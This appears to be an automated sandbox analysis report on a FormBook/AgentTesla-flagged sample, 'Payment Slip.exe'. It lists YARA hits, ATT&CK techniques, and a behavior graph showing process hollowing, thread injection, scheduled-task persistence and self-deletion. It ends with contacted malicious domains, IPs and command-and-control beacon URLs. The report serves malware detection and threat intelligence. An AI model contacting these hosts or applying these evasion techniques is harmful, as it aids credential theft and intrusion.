            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491436 Sample: Payment Slip.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 39 www.relativewifi.com 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 9 other signatures 2->53 11 Payment Slip.exe 7 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\...\tmp4F38.tmp, XML 11->35 dropped 37 C:\Users\user\AppData\Roaming\uVxomBuy.exe, PE32 11->37 dropped 57 Injects a PE file into a foreign processes 11->57 15 Payment Slip.exe 11->15         started        18 schtasks.exe 1 11->18         started        20 Payment Slip.exe 11->20         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 22 explorer.exe 15->22 injected 26 conhost.exe 18->26         started        process9 dnsIp10 41 www.b0ay.com 45.207.75.185, 49841, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 22->41 43 yuumgo.academy 75.102.22.71, 49840, 80 SERVERCENTRALUS United States 22->43 45 6 other IPs or domains 22->45 55 System process connects to network (likely due to code injection or exploit) 22->55 28 cscript.exe 22->28         started        signatures11 process12 signatures13 59 Self deletion via cmd delete 28->59 61 Modifies the context of a thread in another process (thread injection) 28->61 63 Maps a DLL or memory area into another process 28->63 65 Tries to detect virtualization through RDTSC time measurements 28->65 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment Slip.exe2%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\uVxomBuy.exe2%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.Payment Slip.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.b0ay.com/qfff/?h0Dpm=0w7wS7Gxy1y5PVkYFF5lNTBCNhhGoi1bMCJY/cwIOuW+ZMKS9RSTzNeIK/4fDqykK2MY&zVsX=A0Gd4dmxD4WpN0%Avira URL Cloudsafe
            http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            www.yuumgo.academy/qfff/0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.interweavelife.com/qfff/?h0Dpm=vpb6mGWiOxgVIXv3RY5+KwgpuQ4maEKqCh4MrndOejQXnr3fUcd6GXEqF18QrWYsNfL0&zVsX=A0Gd4dmxD4WpN0%Avira URL Cloudsafe
            http://www.axswallet.com/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=WUvvsVcot/hHbudm+hsx8n+3xo5kp+HgCKvLXtoOkn7qJe0B64lU7/LdjKxnrj37XfZ90%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.yuumgo.academy/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=iDjkn8VHWDd5B+WgyzOmaYrOSSt87z3Zq6ekoRCiL96i4fBr+80owih/KVqhv8s04Bt00%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.00333v.com/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=EtMhOrO65XWqZe1V/yWpI1DgXrgEJw48YTYdNBZuHNrU3gzc/ZcPLe5HxHKJImHY7C2C0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.00333v.com
            45.39.212.49
            truetrue
              unknown
              interweavelife.com
              34.102.136.180
              truefalse
                unknown
                www.b0ay.com
                45.207.75.185
                truetrue
                  unknown
                  www.relativewifi.com
                  170.75.251.7
                  truefalse
                    unknown
                    parkingpage.namecheap.com
                    198.54.117.211
                    truefalse
                      high
                      yuumgo.academy
                      75.102.22.71
                      truetrue
                        unknown
                        www.interweavelife.com
                        unknown
                        unknowntrue
                          unknown
                          www.yuumgo.academy
                          unknown
                          unknowntrue
                            unknown
                            www.axswallet.com
                            unknown
                            unknowntrue
                              unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.b0ay.com/qfff/?h0Dpm=0w7wS7Gxy1y5PVkYFF5lNTBCNhhGoi1bMCJY/cwIOuW+ZMKS9RSTzNeIK/4fDqykK2MY&zVsX=A0Gd4dmxD4WpNtrue
                              • Avira URL Cloud: safe
                              unknown
                              www.yuumgo.academy/qfff/true
                              • Avira URL Cloud: safe
                              low
                              http://www.interweavelife.com/qfff/?h0Dpm=vpb6mGWiOxgVIXv3RY5+KwgpuQ4maEKqCh4MrndOejQXnr3fUcd6GXEqF18QrWYsNfL0&zVsX=A0Gd4dmxD4WpNfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.axswallet.com/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=WUvvsVcot/hHbudm+hsx8n+3xo5kp+HgCKvLXtoOkn7qJe0B64lU7/LdjKxnrj37XfZ9true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.yuumgo.academy/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=iDjkn8VHWDd5B+WgyzOmaYrOSSt87z3Zq6ekoRCiL96i4fBr+80owih/KVqhv8s04Bt0true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.00333v.com/qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=EtMhOrO65XWqZe1V/yWpI1DgXrgEJw48YTYdNBZuHNrU3gzc/ZcPLe5HxHKJImHY7C2Ctrue
                              • Avira URL Cloud: safe
                              unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                high
